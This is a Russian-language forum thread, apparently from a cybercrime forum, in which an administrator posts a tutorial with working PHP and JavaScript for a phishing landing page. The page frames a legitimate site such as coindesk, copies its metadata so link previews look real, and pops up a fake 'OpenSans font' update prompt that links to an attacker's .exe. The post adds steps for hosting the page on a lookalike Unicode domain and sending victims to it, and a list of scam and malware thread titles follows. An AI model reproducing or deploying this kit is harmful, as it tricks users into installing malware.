Замашка на универсальный лендинг для выдачи EXE

Admin

Original poster
Administrator
Сообщения
916
Реакции
753
Посетить сайт
Идея заключается в более-менее универсальном способе точечного впаривания exe (а возможно и не только) целевой аудитории
Я думаю только ленивый не слышал о нашумевшей не так давно кампании Hoefler Text, когда на шеллы заливался лендинг-имплант предлагавший "установить шрифт"
1.png
Сегодня мы попытаемся повторить что-то эдакое, только без необходимости ломать целевой ресурс - мы постараемся его универсально подделать.

Для начала, создадим незамысловатую структуру файлов (тут и далее будем писать на РНР и немного JS):
2.png
В style.css внесем самые обычные стили

Код:
html,body{
height:100%;
overflow:hidden;
}
*{
margin:0px;
padding:0px;
}
iframe{
height:100%;
width: 100%;
border:none;
}
Вся задумка заключается в том, что для отображения контента мы не будем парсить и проксировать сайт-донор, а отобразим его во фрейме на стороне клиента (так мы убережемся и от неправильного парсинга, например из-за прокладок и DDOS-защит и самое главное сохраним куки пользователя - если он авторизован на сайте-доноре он увидит все свои привычные настройки и свою сессию). Фрейм бы будем вкладывать в еще один фрейм (для обхода сайтов которые проверяют window.opener и window.top), дабы избежать "выхода" донора из фрейма

Итого, нам нужно :

1) Показать во фрейме на весь экран оригинальный ресурс (любую его страницу)
2) Подождать пару секунд (дать пользователю сконцентрировать на ней внимание)
3) Отобразить модальное окошко с предложением скачать и установить шрифт

Забегая наперед, для одной из страниц сайта coindesk выглядеть это будет вот так :
3.png
Итак, сказано - сделано. Приступим к простому коду нашей системы :

В файл index.php внесем такой код :
Код:
<?php
$origUrl = base64_decode(urldecode($_GET['u']));
$pageSource = file_get_contents("http://".$origUrl);

$pageSource = preg_replace("/<body(.+)<.body>/sim", " ",$pageSource);
$pageSource = str_replace(".js", ".404js",$pageSource);
$pageSource = str_replace(".css", ".404css",$pageSource);



?>

<?php

echo $pageSource;

?>
<body>
   <link rel="stylesheet" href="style.css"/>
<iframe src="frame.php?u=<?= $_GET["u"] ?>" scroll="no"></iframe>   
</body>
</html>
Здесь мы сначала декодируем параметр (целевую страницу) который пришел нам в GET, затем пытаемся забрать ее http-тело, из которого в последствии вырежем содержимое тега <BODY>
Делается это для того, что бы забрать содержимое HEAD (которое мы включаем в страницу) и подменить во-первых заголовок страницы, а во-вторых подменить очень важные для нас meta:eek:rg параметры


Видели как социальные сети и мессенджеры на лету генерят превьюхи для новостников? Сфейканая таким образом страница будет выглядеть на превью абсолютно идентично, благодаря забору этих аттрибутов

Тот же зафейканый coindesk :
4.png
Осталось сделать саму модалку - использовать будем встроенную в bootstrap. Ниже приведен код frame.php
Код:
<?php
$origUrl = base64_decode(urldecode($_GET['u']));
?>

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title></title>
<link rel="stylesheet" href="style.css">
<link rel="stylesheet" href="https://v4-alpha.getbootstrap.com/dist/css/bootstrap.min.css" type="text/css" />
<script src="//code.jquery.com/jquery-latest.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/tether/1.4.3/js/tether.min.js"></script>
<script src="https://v4-alpha.getbootstrap.com/dist/js/bootstrap.min.js"></script>

</head>
<body>
<div class="modal fade" id="myModal" tabindex="-1" role="dialog" aria-labelledby="exampleModalLabel" aria-hidden="true">
 <div class="modal-dialog" role="document">
   <div class="modal-content">
     <div class="modal-header">
       <h5 class="modal-title" id="exampleModalLabel"><img src="http://tech-files.com/wp-content/uploads/2017/09/chrome_1-664x374.jpg" height="80px" /></h5>
       </button>
     </div>
     <div class="modal-body">
       <div class="container-fluid">
       <div class="col-xs-8">
       This webpage requires updated version of <b>OpenSans</b> font<br/>
       Please, install it by clicking <a href="http://your-super-site.com/file.exe">here</a>
       </div>
       </div>
     </div>
   </div>
 </div>
</div>
<iframe src="//<?= $origUrl ?>"></iframe>   

<script>
$(document).ready(function(){

setTimeout(function(){
 $("#myModal").modal();
},1300);

})
</script>
</body>
</html>

Соотвественно для работы, линк

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

нужно будет заменить на свой exe doc zip cab а текст разводки отредактировать под себя.

Обобщая, рецепт успеха таков :

1. Кодируем нужный url в base64 БЕЗ http, например coindesk.com/topped-out-bitcoin-flirts-with-short-term-bearish-reversal/ превратится в Y29pbmRlc2suY29tL3RvcHBlZC1vdXQtYml0Y29pbi1mbGlydHMtd2l0aC1zaG9ydC10ZXJtLWJlYXJp
c2gtcmV2ZXJzYWwv.
Кодировать можно например на base64.ru
2. Заливаем фейк на домен (конечно берем максимально похожий, например с кириллицей или иным юникодом)
3. Шем пользователя на страницу your-fake-domain.com/index.php?u=YOUR_BASE64_HERE
4. ???
5. PROFIT!!!

Идея безусловно нуждается в доработке, однако считаю такое направление в подделке страниц весьма перспективным
Говнокод написаный на бегу можно скачать здесь :

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


Всех с наступающим!
 
N

naxaji

прикольная тема ребят а вот делал в углу висит како-то квадрат как его вообще убрать а то не красиво получается знаний нет вообще в этом...

2018-08-19_112330.png
 

lamer2018g

New Member
Сообщения
2
Реакции
0
Посетить сайт
Идея безусловно нуждается в доработке, однако считаю такое направление в подделке страниц весьма перспективным
Говнокод написаный на бегу можно скачать здесь :

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


Всех с наступающим!
А можно перезалить ?
С ув.
 
Название темы
Автор Заголовок Раздел Ответы Дата
obscure Интересно YouTube канал на кардер\хаккинг\скам\кодер тематику Видео/Музыка 0
ChangeExpert Ожидает оплаты ChangeExpert - первый полностью автоматизированный криптовалютный обменник на рынке РФ Обменники 1
Support81 Был героем – стал злодеем: почему уставшие ИБ-специалисты встают на путь криминала Новости в сети 0
F Ручное размещение тем на разных форумах и продажа базы. Ищу работу. Предлагаю свои услуги. 0
Support81 Loop DoS: бесконечные циклы на службе киберпреступников Новости в сети 0
M Работа на выгодных условиях без особого труда. Предоставляю работу. Ищу специалиста. 0
Support81 ФБР: технологии могут повлиять на американские выборы в 2024 году Новости в сети 0
Emilio_Gaviriya Статья Поиск уязвимостей на хосте. Уязвимости и взлом 1
Support81 Американские власти наложили санкции на разработчиков спайвари Predator Новости в сети 0
Support81 Фишинг-кит CryptoChameleon ориентирован на пользователей мобильных устройств Новости в сети 0
srv24 Продам SRV24 - выделенные серверы в 193 странах мира от 15$! Скидки при оплате на 1 год! Заходи! Сайты/Хостинг/Сервера 1
Support81 Xeno RAT опубликован на GitHub: продвинутый кибершпионаж теперь доступен каждому Новости в сети 0
Support81 Более 100 тысяч зараженных репозиториев на GitHub маскируются под легитимные проекты Новости в сети 0
Emilio_Gaviriya Статья Как ловить хакеров на живца. Уязвимости и взлом 0
Support81 Картинки PNG - новый способ доставки троянов на компьютеры организаций Новости в сети 0
Support81 Темный рыцарь на продажу: в чьих руках окажется исходный код вымогателя Knight 3.0? Новости в сети 0
Emilio_Gaviriya Статья Безопасность на серверах. Уязвимости и взлом 0
zpcny Продам ✅⭐️ Check My IP - самая глубокая проверка IP на чистоту и GEO⭐️ ✅ Дедики/VPN/соксы/ssh 4
Support81 Google разоблачила сеть компаний-шпионов, работающих на правительства Новости в сети 1
turbion0 Министерство юстиции США раскрыло схему мошенничества с криптовалютой на 1,89 млрд долларов. Новости в сети 0
turbion0 В Пензе мошенница получила от государства миллион рублей на несуществующих детей Новости в сети 0
turbion0 Мошенники оформили на малоимущих астраханцев 30 млн рублей кредитов Новости в сети 0
Support81 Взлом или небрежность? Код и пароли Binance были доступны на GitHub в течение нескольких месяцев Новости в сети 0
Emilio_Gaviriya Статья Защита конфиденциальности: Как сбросить данные на Android в экстренных ситуациях. Полезные статьи 0
Support81 Просчитались, но где? Заказ на убийство в зашифрованном чате обернулся для бандитов тюрьмой Новости в сети 0
0 Лутаем Кэш на рефаунде Сбермаркета Способы заработка 0
0 Лутаем Кэш на бесконечной подписке Яндекс Плюс Способы заработка 0
Emilio_Gaviriya Статья Инструкция по обнаружению хоста и тестированию на проникновение. Уязвимости и взлом 0
Ёшкин_кот Интересно Определение объёма встроенной видео памяти на ноутбуке. Свободное общение и флейм 0
Support81 Conti и Royal получили мощного союзника: хакеры 3AM вступают в игру, но кто они на самом деле? Новости в сети 0
Support81 Обманутые старики и пропавшие миллионы: член группировки Black Axe осужден на 10 лет тюрьмы Новости в сети 0
Support81 Запрет на выплаты вымогателям: как отказ от выкупа усилит атаки на критическую инфраструктуру Новости в сети 0
АнАлЬнАя ЧуПаКаБрА Сервис Проект с выводом на крипту + (Покупка лотерейных билетов) Проекты Private Keeper 0
DELTABEK Как зарабатывать 100.000 рублей в день на арбитраже криптовалют? Способы заработка 5
Support81 В 2023 году Роскомнадзор заблокировал на 10% меньше страниц, чем в прошлом году Новости в сети 1
D До 7к на Бездепах казино Способы заработка 1
Ёшкин_кот Интересно Пишем любой текст на листочке который держит обнажённая девушка. 18+ Свободное общение и флейм 0
NovaBaseNova Базы на заказ. Собираем по любым направлениям! Ищу работу. Предлагаю свои услуги. 0
Support81 Оплата за лайки: раскрыта мошенническая схема заработка на YouTube Новости в сети 0
M Схема заработка на онлайн рулетке Способы заработка 5
Aimer2033 Интересно Мегамаркет. Скидка 1000 рублей при покупке от 3000 рублей на все, на первый заказ. Другое 18
turbion0 Россиянка украла из офиса бумагу на 24 миллиона рублей и купила себе квартиру Новости в сети 1
M Мегазаработок на телеграм Способы заработка 1
Support81 Власти бессильны: количество пользователей VPN в России выросло на 37% за год Новости в сети 0
C Зарабатываем на дрочерах | Высокий % | Доведем до профита Ищу работу. Предлагаю свои услуги. 0
Support81 Стримерам на заметку: Жестокость в эфире вне закона Новости в сети 0
Support81 Охота на мамонтов продолжается: «Неандертальцы» не оставляют шанса пользователям Авито, Юлы и СДЭК Новости в сети 0
К Продам Продам интернет магазины сладостей вк и инстаграме. Отличный вариант для скама на новогодних подарках. Все что не подошло по разделу 0
Support81 Азиатские хакеры ведут ожесточенные кибератаки на российские системы Новости в сети 0
Support81 Важно!!! Создаем свой VPN с защищенным от блокировок протоколом AmneziaWG, или WireGuard на максималках Анонимность и приватность 3

Название темы